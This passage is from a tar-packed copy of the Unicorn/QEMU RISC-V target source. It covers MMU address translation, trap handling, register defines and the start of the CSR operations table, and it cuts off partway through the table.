&pa, &prot, address, access_type, mmu_idx, true, true); qemu_log_mask(CPU_LOG_MMU, "%s 1st-stage address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx " prot %d\n", __func__, address, ret, pa, prot); if (ret != TRANSLATE_FAIL) { /* Second stage lookup */ im_address = pa; ret = get_physical_address(env, &pa, &prot, im_address, access_type, mmu_idx, false, true); qemu_log_mask(CPU_LOG_MMU, "%s 2nd-stage address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx " prot %d\n", __func__, im_address, ret, pa, prot); if (riscv_feature(env, RISCV_FEATURE_PMP) && (ret == TRANSLATE_SUCCESS) && !pmp_hart_has_privs(env, pa, size, 1 << access_type, mode)) { ret = TRANSLATE_PMP_FAIL; } if (ret != TRANSLATE_SUCCESS) { /* * Guest physical address translation failed, this is a HS * level exception */ first_stage_error = false; env->guest_phys_fault_addr = (im_address | (address & (TARGET_PAGE_SIZE - 1))) >> 2; } } } else { /* Single stage lookup */ ret = get_physical_address(env, &pa, &prot, address, access_type, mmu_idx, true, false); qemu_log_mask(CPU_LOG_MMU, "%s address=%" VADDR_PRIx " ret %d physical " TARGET_FMT_plx " prot %d\n", __func__, address, ret, pa, prot); } if (riscv_feature(env, RISCV_FEATURE_PMP) && (ret == TRANSLATE_SUCCESS) && !pmp_hart_has_privs(env, pa, size, 1 << access_type, mode)) { ret = TRANSLATE_PMP_FAIL; } if (ret == TRANSLATE_PMP_FAIL) { pmp_violation = true; } if (ret == TRANSLATE_SUCCESS) { tlb_set_page(cs, address & TARGET_PAGE_MASK, pa & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } else if (probe) { return false; } else { raise_mmu_exception(env, address, access_type, pmp_violation, first_stage_error); riscv_raise_exception(env, cs->exception_index, retaddr); } return true; } /* * Handle Traps * * Adapted from Spike's processor_t::take_trap. * */ void riscv_cpu_do_interrupt(CPUState *cs) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; bool force_hs_execp = riscv_cpu_force_hs_excep_enabled(env); target_ulong s; /* cs->exception is 32-bits wide unlike mcause which is XLEN-bits wide * so we mask off the MSB and separate into trap type and cause. */ bool async = !!(cs->exception_index & RISCV_EXCP_INT_FLAG); target_ulong cause = cs->exception_index & RISCV_EXCP_INT_MASK; target_ulong deleg = async ? env->mideleg : env->medeleg; target_ulong tval = 0; target_ulong htval = 0; target_ulong mtval2 = 0; if (!async) { /* set tval to badaddr for traps with address information */ switch (cause) { case RISCV_EXCP_INST_GUEST_PAGE_FAULT: case RISCV_EXCP_LOAD_GUEST_ACCESS_FAULT: case RISCV_EXCP_STORE_GUEST_AMO_ACCESS_FAULT: force_hs_execp = true; /* fallthrough */ case RISCV_EXCP_INST_ADDR_MIS: case RISCV_EXCP_INST_ACCESS_FAULT: case RISCV_EXCP_LOAD_ADDR_MIS: case RISCV_EXCP_STORE_AMO_ADDR_MIS: case RISCV_EXCP_LOAD_ACCESS_FAULT: case RISCV_EXCP_STORE_AMO_ACCESS_FAULT: case RISCV_EXCP_INST_PAGE_FAULT: case RISCV_EXCP_LOAD_PAGE_FAULT: case RISCV_EXCP_STORE_PAGE_FAULT: tval = env->badaddr; break; default: break; } /* ecall is dispatched as one cause so translate based on mode */ if (cause == RISCV_EXCP_U_ECALL) { assert(env->priv <= 3); if (env->priv == PRV_M) { cause = RISCV_EXCP_M_ECALL; } else if (env->priv == PRV_S && riscv_cpu_virt_enabled(env)) { cause = RISCV_EXCP_VS_ECALL; } else if (env->priv == PRV_S && !riscv_cpu_virt_enabled(env)) { cause = RISCV_EXCP_S_ECALL; } else if (env->priv == PRV_U) { cause = RISCV_EXCP_U_ECALL; } } } if (env->priv <= PRV_S && cause < TARGET_LONG_BITS && ((deleg >> cause) & 1)) { /* handle the trap in S-mode */ if (riscv_has_ext(env, RVH)) { target_ulong hdeleg = async ? env->hideleg : env->hedeleg; if (riscv_cpu_virt_enabled(env) && ((hdeleg >> cause) & 1) && !force_hs_execp) { /* * See if we need to adjust cause. Yes if its VS mode interrupt * no if hypervisor has delegated one of hs mode's interrupt */ if (cause == IRQ_VS_TIMER || cause == IRQ_VS_SOFT || cause == IRQ_VS_EXT) cause = cause - 1; /* Trap to VS mode */ } else if (riscv_cpu_virt_enabled(env)) { /* Trap into HS mode, from virt */ riscv_cpu_swap_hypervisor_regs(env); env->hstatus = set_field(env->hstatus, HSTATUS_SP2V, get_field(env->hstatus, HSTATUS_SPV)); env->hstatus = set_field(env->hstatus, HSTATUS_SP2P, get_field(env->mstatus, SSTATUS_SPP)); env->hstatus = set_field(env->hstatus, HSTATUS_SPV, riscv_cpu_virt_enabled(env)); htval = env->guest_phys_fault_addr; riscv_cpu_set_virt_enabled(env, 0); riscv_cpu_set_force_hs_excep(env, 0); } else { /* Trap into HS mode */ env->hstatus = set_field(env->hstatus, HSTATUS_SP2V, get_field(env->hstatus, HSTATUS_SPV)); env->hstatus = set_field(env->hstatus, HSTATUS_SP2P, get_field(env->mstatus, SSTATUS_SPP)); env->hstatus = set_field(env->hstatus, HSTATUS_SPV, riscv_cpu_virt_enabled(env)); htval = env->guest_phys_fault_addr; } } s = env->mstatus; s = set_field(s, MSTATUS_SPIE, env->priv_ver >= PRIV_VERSION_1_10_0 ? get_field(s, MSTATUS_SIE) : get_field(s, MSTATUS_UIE << env->priv)); s = set_field(s, MSTATUS_SPP, env->priv); s = set_field(s, MSTATUS_SIE, 0); env->mstatus = s; env->scause = cause | ((target_ulong)async << (TARGET_LONG_BITS - 1)); env->sepc = env->pc; env->sbadaddr = tval; env->htval = htval; env->pc = (env->stvec >> 2 << 2) + ((async && (env->stvec & 3) == 1) ? cause * 4 : 0); riscv_cpu_set_mode(env, PRV_S); } else { /* handle the trap in M-mode */ if (riscv_has_ext(env, RVH)) { if (riscv_cpu_virt_enabled(env)) { riscv_cpu_swap_hypervisor_regs(env); } #ifdef TARGET_RISCV32 env->mstatush = set_field(env->mstatush, MSTATUS_MPV, riscv_cpu_virt_enabled(env)); env->mstatush = set_field(env->mstatush, MSTATUS_MTL, riscv_cpu_force_hs_excep_enabled(env)); #else env->mstatus = set_field(env->mstatus, MSTATUS_MPV, riscv_cpu_virt_enabled(env)); env->mstatus = set_field(env->mstatus, MSTATUS_MTL, riscv_cpu_force_hs_excep_enabled(env)); #endif mtval2 = env->guest_phys_fault_addr; /* Trapping to M mode, virt is disabled */ riscv_cpu_set_virt_enabled(env, 0); riscv_cpu_set_force_hs_excep(env, 0); } s = env->mstatus; s = set_field(s, MSTATUS_MPIE, env->priv_ver >= PRIV_VERSION_1_10_0 ? get_field(s, MSTATUS_MIE) : get_field(s, MSTATUS_UIE << env->priv)); s = set_field(s, MSTATUS_MPP, env->priv); s = set_field(s, MSTATUS_MIE, 0); env->mstatus = s; env->mcause = cause | ~(((target_ulong)-1) >> async); env->mepc = env->pc; env->mbadaddr = tval; env->mtval2 = mtval2; env->pc = (env->mtvec >> 2 << 2) + ((async && (env->mtvec & 3) == 1) ? cause * 4 : 0); riscv_cpu_set_mode(env, PRV_M); } /* NOTE: it is not necessary to yield load reservations here. It is only * necessary for an SC from "another hart" to cause a load reservation * to be yielded. Refer to the memory consistency model section of the * RISC-V ISA Specification. */ cs->exception_index = EXCP_NONE; /* mark handled to qemu */ } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/cpu_user.h����������������������������������������������������������0000664�0000000�0000000�00000000744�14675241067�0020572�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef TARGET_RISCV_CPU_USER_H #define TARGET_RISCV_CPU_USER_H #define xRA 1 /* return address (aka link register) */ #define xSP 2 /* stack pointer */ #define xGP 3 /* global pointer */ #define xTP 4 /* thread pointer */ #define xA0 10 /* gpr[10-17] are syscall arguments */ #define xA1 11 #define xA2 12 #define xA3 13 #define xA4 14 #define xA5 15 #define xA6 16 #define xA7 17 /* syscall number for RVI ABI */ #define xT0 5 /* syscall number for RVE ABI */ #endif ����������������������������unicorn-2.1.1/qemu/target/riscv/csr.c���������������������������������������������������������������0000664�0000000�0000000�00000152350�14675241067�0017530�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V Control and Status Registers. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2017-2018 SiFive, Inc. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" static int fs(CPURISCVState *env, int csrno); static int read_fflags(CPURISCVState *env, int csrno, target_ulong *val); static int write_fflags(CPURISCVState *env, int csrno, target_ulong val); static int read_frm(CPURISCVState *env, int csrno, target_ulong *val); static int write_frm(CPURISCVState *env, int csrno, target_ulong val); static int read_fcsr(CPURISCVState *env, int csrno, target_ulong *val); static int write_fcsr(CPURISCVState *env, int csrno, target_ulong val); static int ctr(CPURISCVState *env, int csrno); static int read_instret(CPURISCVState *env, int csrno, target_ulong *val); static int read_time(CPURISCVState *env, int csrno, target_ulong *val); static int any(CPURISCVState *env, int csrno); static int read_zero(CPURISCVState *env, int csrno, target_ulong *val); static int read_mhartid(CPURISCVState *env, int csrno, target_ulong *val); static int read_mstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_mstatus(CPURISCVState *env, int csrno, target_ulong val); static int read_misa(CPURISCVState *env, int csrno, target_ulong *val); static int write_misa(CPURISCVState *env, int csrno, target_ulong val); static int read_mideleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_mideleg(CPURISCVState *env, int csrno, target_ulong val); static int read_medeleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_medeleg(CPURISCVState *env, int csrno, target_ulong val); static int read_mie(CPURISCVState *env, int csrno, target_ulong *val); static int write_mie(CPURISCVState *env, int csrno, target_ulong val); static int read_mtvec(CPURISCVState *env, int csrno, target_ulong *val); static int write_mtvec(CPURISCVState *env, int csrno, target_ulong val); static int read_mcounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_mcounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_mucounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_mucounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_mscounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_mscounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_mscratch(CPURISCVState *env, int csrno, target_ulong *val); static int write_mscratch(CPURISCVState *env, int csrno, target_ulong val); static int read_mepc(CPURISCVState *env, int csrno, target_ulong *val); static int write_mepc(CPURISCVState *env, int csrno, target_ulong val); static int read_mcause(CPURISCVState *env, int csrno, target_ulong *val); static int write_mcause(CPURISCVState *env, int csrno, target_ulong val); static int read_mbadaddr(CPURISCVState *env, int csrno, target_ulong *val); static int write_mbadaddr(CPURISCVState *env, int csrno, target_ulong val); static int rmw_mip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int smode(CPURISCVState *env, int csrno); static int read_sstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_sstatus(CPURISCVState *env, int csrno, target_ulong val); static int read_sie(CPURISCVState *env, int csrno, target_ulong *val); static int write_sie(CPURISCVState *env, int csrno, target_ulong val); static int read_stvec(CPURISCVState *env, int csrno, target_ulong *val); static int write_stvec(CPURISCVState *env, int csrno, target_ulong val); static int read_scounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_scounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_sscratch(CPURISCVState *env, int csrno, target_ulong *val); static int write_sscratch(CPURISCVState *env, int csrno, target_ulong val); static int read_sepc(CPURISCVState *env, int csrno, target_ulong *val); static int write_sepc(CPURISCVState *env, int csrno, target_ulong val); static int read_scause(CPURISCVState *env, int csrno, target_ulong *val); static int write_scause(CPURISCVState *env, int csrno, target_ulong val); static int read_sbadaddr(CPURISCVState *env, int csrno, target_ulong *val); static int write_sbadaddr(CPURISCVState *env, int csrno, target_ulong val); static int rmw_sip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int read_satp(CPURISCVState *env, int csrno, target_ulong *val); static int write_satp(CPURISCVState *env, int csrno, target_ulong val); static int read_hstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_hstatus(CPURISCVState *env, int csrno, target_ulong val); static int hmode(CPURISCVState *env, int csrno); static int read_hedeleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_hedeleg(CPURISCVState *env, int csrno, target_ulong val); static int read_hideleg(CPURISCVState *env, int csrno, target_ulong *val); static int write_hideleg(CPURISCVState *env, int csrno, target_ulong val); static int rmw_hip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int read_hie(CPURISCVState *env, int csrno, target_ulong *val); static int write_hie(CPURISCVState *env, int csrno, target_ulong val); static int read_hcounteren(CPURISCVState *env, int csrno, target_ulong *val); static int write_hcounteren(CPURISCVState *env, int csrno, target_ulong val); static int read_htval(CPURISCVState *env, int csrno, target_ulong *val); static int write_htval(CPURISCVState *env, int csrno, target_ulong val); static int read_htinst(CPURISCVState *env, int csrno, target_ulong *val); static int write_htinst(CPURISCVState *env, int csrno, target_ulong val); static int read_hgatp(CPURISCVState *env, int csrno, target_ulong *val); static int write_hgatp(CPURISCVState *env, int csrno, target_ulong val); static int read_htimedelta(CPURISCVState *env, int csrno, target_ulong *val); static int write_htimedelta(CPURISCVState *env, int csrno, target_ulong val); static int read_vsstatus(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsstatus(CPURISCVState *env, int csrno, target_ulong val); static int rmw_vsip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask); static int read_vsie(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsie(CPURISCVState *env, int csrno, target_ulong val); static int read_vstvec(CPURISCVState *env, int csrno, target_ulong *val); static int write_vstvec(CPURISCVState *env, int csrno, target_ulong val); static int read_vsscratch(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsscratch(CPURISCVState *env, int csrno, target_ulong val); static int read_vsepc(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsepc(CPURISCVState *env, int csrno, target_ulong val); static int read_vscause(CPURISCVState *env, int csrno, target_ulong *val); static int write_vscause(CPURISCVState *env, int csrno, target_ulong val); static int read_vstval(CPURISCVState *env, int csrno, target_ulong *val); static int write_vstval(CPURISCVState *env, int csrno, target_ulong val); static int read_vsatp(CPURISCVState *env, int csrno, target_ulong *val); static int write_vsatp(CPURISCVState *env, int csrno, target_ulong val); static int read_mtval2(CPURISCVState *env, int csrno, target_ulong *val); static int write_mtval2(CPURISCVState *env, int csrno, target_ulong val); static int read_mtinst(CPURISCVState *env, int csrno, target_ulong *val); static int write_mtinst(CPURISCVState *env, int csrno, target_ulong val); static int read_pmpcfg(CPURISCVState *env, int csrno, target_ulong *val); static int write_pmpcfg(CPURISCVState *env, int csrno, target_ulong val); static int read_pmpaddr(CPURISCVState *env, int csrno, target_ulong *val); static int write_pmpaddr(CPURISCVState *env, int csrno, target_ulong val); static int pmp(CPURISCVState *env, int csrno); #if defined(TARGET_RISCV32) static int read_instreth(CPURISCVState *env, int csrno, target_ulong *val); static int read_timeh(CPURISCVState *env, int csrno, target_ulong *val); static int read_mstatush(CPURISCVState *env, int csrno, target_ulong *val); static int write_mstatush(CPURISCVState *env, int csrno, target_ulong val); static int read_htimedeltah(CPURISCVState *env, int csrno, target_ulong *val); static int write_htimedeltah(CPURISCVState *env, int csrno, target_ulong val); #endif /* CSR function table constants */ enum { CSR_TABLE_SIZE = 0x1000 }; /* Control and Status Register function table */ static riscv_csr_operations csr_ops[CSR_TABLE_SIZE] = { /* User Floating-Point CSRs */ [CSR_FFLAGS] = { fs, read_fflags, write_fflags }, [CSR_FRM] = { fs, read_frm, write_frm }, [CSR_FCSR] = { fs, read_fcsr, write_fcsr }, /* User Timers and Counters */ [CSR_CYCLE] = { ctr, read_instret }, [CSR_INSTRET] = { ctr, read_instret }, #if defined(TARGET_RISCV32) [CSR_CYCLEH] = { ctr, read_instreth }, [CSR_INSTRETH] = { ctr, read_instreth }, #endif /* In privileged mode, the monitor will have to emulate TIME CSRs only if * rdtime callback is not provided by machine/platform emulation */ [CSR_TIME] = { ctr, read_time }, #if defined(TARGET_RISCV32) [CSR_TIMEH] = { ctr, read_timeh }, #endif /* Machine Timers and Counters */ [CSR_MCYCLE] = { any, read_instret }, [CSR_MINSTRET] = { any, read_instret }, #if defined(TARGET_RISCV32) [CSR_MCYCLEH] = { any, read_instreth }, [CSR_MINSTRETH] = { any, read_instreth }, #endif /* Machine Information Registers */ [CSR_MVENDORID] = { any, read_zero }, [CSR_MARCHID] = { any, read_zero }, [CSR_MIMPID] = { any, read_zero }, [CSR_MHARTID] = { any, read_mhartid }, /* Machine Trap Setup */ [CSR_MSTATUS] = { any, read_mstatus, write_mstatus }, [CSR_MISA] = { any, read_misa, write_misa }, [CSR_MIDELEG] = { any, read_mideleg, write_mideleg }, [CSR_MEDELEG] = { any, read_medeleg, write_medeleg }, [CSR_MIE] = { any, read_mie, write_mie }, [CSR_MTVEC] = { any, read_mtvec, write_mtvec }, [CSR_MCOUNTEREN] = { any, read_mcounteren, write_mcounteren }, #if defined(TARGET_RISCV32) [CSR_MSTATUSH] = { any, read_mstatush, write_mstatush }, #endif /* Legacy Counter Setup (priv v1.9.1) */ [CSR_MUCOUNTEREN] = { any, read_mucounteren, write_mucounteren }, [CSR_MSCOUNTEREN] = { any, read_mscounteren, write_mscounteren }, /* Machine Trap Handling */ [CSR_MSCRATCH] = { any, read_mscratch, write_mscratch }, [CSR_MEPC] = { any, read_mepc, write_mepc }, [CSR_MCAUSE] = { any, read_mcause, write_mcause }, [CSR_MBADADDR] = { any, read_mbadaddr, write_mbadaddr }, [CSR_MIP] = { any, NULL, NULL, rmw_mip }, /* Supervisor Trap Setup */ [CSR_SSTATUS] = { smode, read_sstatus, write_sstatus }, [CSR_SIE] = { smode, read_sie, write_sie }, [CSR_STVEC] = { smode, read_stvec, write_stvec }, [CSR_SCOUNTEREN] = { smode, read_scounteren, write_scounteren }, /* Supervisor Trap Handling */ [CSR_SSCRATCH] = { smode, read_sscratch, write_sscratch }, [CSR_SEPC] = { smode, read_sepc, write_sepc }, [CSR_SCAUSE] = { smode, read_scause, write_scause }, [CSR_SBADADDR] = { smode, read_sbadaddr, write_sbadaddr }, [CSR_SIP] = { smode, NULL, NULL, rmw_sip }, /* Supervisor Protection and Translation */ [CSR_SATP] = { smode, read_satp, write_satp }, [CSR_HSTATUS] = { hmode, read_hstatus, write_hstatus }, [CSR_HEDELEG] = { hmode, read_hedeleg, write_hedeleg }, [CSR_HIDELEG] = { hmode, read_hideleg, write_hideleg }, [CSR_HIP] = { hmode, NULL, NULL, rmw_hip }, [CSR_HIE] = { hmode, read_hie, write_hie }, [CSR_HCOUNTEREN] = { hmode, read_hcounteren, write_hcounteren }, [CSR_HTVAL] = { hmode, read_htval, write_htval }, [CSR_HTINST] = { hmode, read_htinst, write_htinst }, [CSR_HGATP] = { hmode, read_hgatp, write_hgatp }, [CSR_HTIMEDELTA] = { hmode, read_htimedelta, write_htimedelta }, #if defined(TARGET_RISCV32) [CSR_HTIMEDELTAH] = { hmode, read_htimedeltah, write_htimedeltah}, #endif [CSR_VSSTATUS] = { hmode, read_vsstatus, write_vsstatus }, [CSR_VSIP] = { hmode, NULL, NULL, rmw_vsip }, [CSR_VSIE] = { hmode, read_vsie, write_vsie }, [CSR_VSTVEC] = { hmode, read_vstvec, write_vstvec }, [CSR_VSSCRATCH] = { hmode, read_vsscratch, write_vsscratch }, [CSR_VSEPC] = { hmode, read_vsepc, write_vsepc }, [CSR_VSCAUSE] = { hmode, read_vscause, write_vscause }, [CSR_VSTVAL] = { hmode, read_vstval, write_vstval }, [CSR_VSATP] = { hmode, read_vsatp, write_vsatp }, [CSR_MTVAL2] = { hmode, read_mtval2, write_mtval2 }, [CSR_MTINST] = { hmode, read_mtinst, write_mtinst }, /* Physical Memory Protection */ [CSR_PMPCFG0] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPCFG1] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPCFG2] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPCFG3] = { pmp, read_pmpcfg, write_pmpcfg }, [CSR_PMPADDR0] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR1] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR2] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR3] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR4] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR5] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR6] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR7] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR8] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR9] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR10] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR11] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR12] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR13] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR14] = { pmp, read_pmpaddr, write_pmpaddr }, [CSR_PMPADDR15] = { pmp, read_pmpaddr, write_pmpaddr }, /* Performance Counters */ [CSR_HPMCOUNTER3] = { ctr, read_zero }, [CSR_HPMCOUNTER4] = { ctr, read_zero }, [CSR_HPMCOUNTER5] = { ctr, read_zero }, [CSR_HPMCOUNTER6] = { ctr, read_zero }, [CSR_HPMCOUNTER7] = { ctr, read_zero }, [CSR_HPMCOUNTER8] = { ctr, read_zero }, [CSR_HPMCOUNTER9] = { ctr, read_zero }, [CSR_HPMCOUNTER10] = { ctr, read_zero }, [CSR_HPMCOUNTER11] = { ctr, read_zero }, [CSR_HPMCOUNTER12] = { ctr, read_zero }, [CSR_HPMCOUNTER13] = { ctr, read_zero }, [CSR_HPMCOUNTER14] = { ctr, read_zero }, [CSR_HPMCOUNTER15] = { ctr, read_zero }, [CSR_HPMCOUNTER16] = { ctr, read_zero }, [CSR_HPMCOUNTER17] = { ctr, read_zero }, [CSR_HPMCOUNTER18] = { ctr, read_zero }, [CSR_HPMCOUNTER19] = { ctr, read_zero }, [CSR_HPMCOUNTER20] = { ctr, read_zero }, [CSR_HPMCOUNTER21] = { ctr, read_zero }, [CSR_HPMCOUNTER22] = { ctr, read_zero }, [CSR_HPMCOUNTER23] = { ctr, read_zero }, [CSR_HPMCOUNTER24] = { ctr, read_zero }, [CSR_HPMCOUNTER25] = { ctr, read_zero }, [CSR_HPMCOUNTER26] = { ctr, read_zero }, [CSR_HPMCOUNTER27] = { ctr, read_zero }, [CSR_HPMCOUNTER28] = { ctr, read_zero }, [CSR_HPMCOUNTER29] = { ctr, read_zero }, [CSR_HPMCOUNTER30] = { ctr, read_zero }, [CSR_HPMCOUNTER31] = { ctr, read_zero }, [CSR_MHPMCOUNTER3] = { any, read_zero }, [CSR_MHPMCOUNTER4] = { any, read_zero }, [CSR_MHPMCOUNTER5] = { any, read_zero }, [CSR_MHPMCOUNTER6] = { any, read_zero }, [CSR_MHPMCOUNTER7] = { any, read_zero }, [CSR_MHPMCOUNTER8] = { any, read_zero }, [CSR_MHPMCOUNTER9] = { any, read_zero }, [CSR_MHPMCOUNTER10] = { any, read_zero }, [CSR_MHPMCOUNTER11] = { any, read_zero }, [CSR_MHPMCOUNTER12] = { any, read_zero }, [CSR_MHPMCOUNTER13] = { any, read_zero }, [CSR_MHPMCOUNTER14] = { any, read_zero }, [CSR_MHPMCOUNTER15] = { any, read_zero }, [CSR_MHPMCOUNTER16] = { any, read_zero }, [CSR_MHPMCOUNTER17] = { any, read_zero }, [CSR_MHPMCOUNTER18] = { any, read_zero }, [CSR_MHPMCOUNTER19] = { any, read_zero }, [CSR_MHPMCOUNTER20] = { any, read_zero }, [CSR_MHPMCOUNTER21] = { any, read_zero }, [CSR_MHPMCOUNTER22] = { any, read_zero }, [CSR_MHPMCOUNTER23] = { any, read_zero }, [CSR_MHPMCOUNTER24] = { any, read_zero }, [CSR_MHPMCOUNTER25] = { any, read_zero }, [CSR_MHPMCOUNTER26] = { any, read_zero }, [CSR_MHPMCOUNTER27] = { any, read_zero }, [CSR_MHPMCOUNTER28] = { any, read_zero }, [CSR_MHPMCOUNTER29] = { any, read_zero }, [CSR_MHPMCOUNTER30] = { any, read_zero }, [CSR_MHPMCOUNTER31] = { any, read_zero }, [CSR_MHPMEVENT3] = { any, read_zero }, [CSR_MHPMEVENT4] = { any, read_zero }, [CSR_MHPMEVENT5] = { any, read_zero }, [CSR_MHPMEVENT6] = { any, read_zero }, [CSR_MHPMEVENT7] = { any, read_zero }, [CSR_MHPMEVENT8] = { any, read_zero }, [CSR_MHPMEVENT9] = { any, read_zero }, [CSR_MHPMEVENT10] = { any, read_zero }, [CSR_MHPMEVENT11] = { any, read_zero }, [CSR_MHPMEVENT12] = { any, read_zero }, [CSR_MHPMEVENT13] = { any, read_zero }, [CSR_MHPMEVENT14] = { any, read_zero }, [CSR_MHPMEVENT15] = { any, read_zero }, [CSR_MHPMEVENT16] = { any, read_zero }, [CSR_MHPMEVENT17] = { any, read_zero }, [CSR_MHPMEVENT18] = { any, read_zero }, [CSR_MHPMEVENT19] = { any, read_zero }, [CSR_MHPMEVENT20] = { any, read_zero }, [CSR_MHPMEVENT21] = { any, read_zero }, [CSR_MHPMEVENT22] = { any, read_zero }, [CSR_MHPMEVENT23] = { any, read_zero }, [CSR_MHPMEVENT24] = { any, read_zero }, [CSR_MHPMEVENT25] = { any, read_zero }, [CSR_MHPMEVENT26] = { any, read_zero }, [CSR_MHPMEVENT27] = { any, read_zero }, [CSR_MHPMEVENT28] = { any, read_zero }, [CSR_MHPMEVENT29] = { any, read_zero }, [CSR_MHPMEVENT30] = { any, read_zero }, [CSR_MHPMEVENT31] = { any, read_zero }, #if defined(TARGET_RISCV32) [CSR_HPMCOUNTER3H] = { ctr, read_zero }, [CSR_HPMCOUNTER4H] = { ctr, read_zero }, [CSR_HPMCOUNTER5H] = { ctr, read_zero }, [CSR_HPMCOUNTER6H] = { ctr, read_zero }, [CSR_HPMCOUNTER7H] = { ctr, read_zero }, [CSR_HPMCOUNTER8H] = { ctr, read_zero }, [CSR_HPMCOUNTER9H] = { ctr, read_zero }, [CSR_HPMCOUNTER10H] = { ctr, read_zero }, [CSR_HPMCOUNTER11H] = { ctr, read_zero }, [CSR_HPMCOUNTER12H] = { ctr, read_zero }, [CSR_HPMCOUNTER13H] = { ctr, read_zero }, [CSR_HPMCOUNTER14H] = { ctr, read_zero }, [CSR_HPMCOUNTER15H] = { ctr, read_zero }, [CSR_HPMCOUNTER16H] = { ctr, read_zero }, [CSR_HPMCOUNTER17H] = { ctr, read_zero }, [CSR_HPMCOUNTER18H] = { ctr, read_zero }, [CSR_HPMCOUNTER19H] = { ctr, read_zero }, [CSR_HPMCOUNTER20H] = { ctr, read_zero }, [CSR_HPMCOUNTER21H] = { ctr, read_zero }, [CSR_HPMCOUNTER22H] = { ctr, read_zero }, [CSR_HPMCOUNTER23H] = { ctr, read_zero }, [CSR_HPMCOUNTER24H] = { ctr, read_zero }, [CSR_HPMCOUNTER25H] = { ctr, read_zero }, [CSR_HPMCOUNTER26H] = { ctr, read_zero }, [CSR_HPMCOUNTER27H] = { ctr, read_zero }, [CSR_HPMCOUNTER28H] = { ctr, read_zero }, [CSR_HPMCOUNTER29H] = { ctr, read_zero }, [CSR_HPMCOUNTER30H] = { ctr, read_zero }, [CSR_HPMCOUNTER31H] = { ctr, read_zero }, [CSR_MHPMCOUNTER3H] = { any, read_zero }, [CSR_MHPMCOUNTER4H] = { any, read_zero }, [CSR_MHPMCOUNTER5H] = { any, read_zero }, [CSR_MHPMCOUNTER6H] = { any, read_zero }, [CSR_MHPMCOUNTER7H] = { any, read_zero }, [CSR_MHPMCOUNTER8H] = { any, read_zero }, [CSR_MHPMCOUNTER9H] = { any, read_zero }, [CSR_MHPMCOUNTER10H] = { any, read_zero }, [CSR_MHPMCOUNTER11H] = { any, read_zero }, [CSR_MHPMCOUNTER12H] = { any, read_zero }, [CSR_MHPMCOUNTER13H] = { any, read_zero }, [CSR_MHPMCOUNTER14H] = { any, read_zero }, [CSR_MHPMCOUNTER15H] = { any, read_zero }, [CSR_MHPMCOUNTER16H] = { any, read_zero }, [CSR_MHPMCOUNTER17H] = { any, read_zero }, [CSR_MHPMCOUNTER18H] = { any, read_zero }, [CSR_MHPMCOUNTER19H] = { any, read_zero }, [CSR_MHPMCOUNTER20H] = { any, read_zero }, [CSR_MHPMCOUNTER21H] = { any, read_zero }, [CSR_MHPMCOUNTER22H] = { any, read_zero }, [CSR_MHPMCOUNTER23H] = { any, read_zero }, [CSR_MHPMCOUNTER24H] = { any, read_zero }, [CSR_MHPMCOUNTER25H] = { any, read_zero }, [CSR_MHPMCOUNTER26H] = 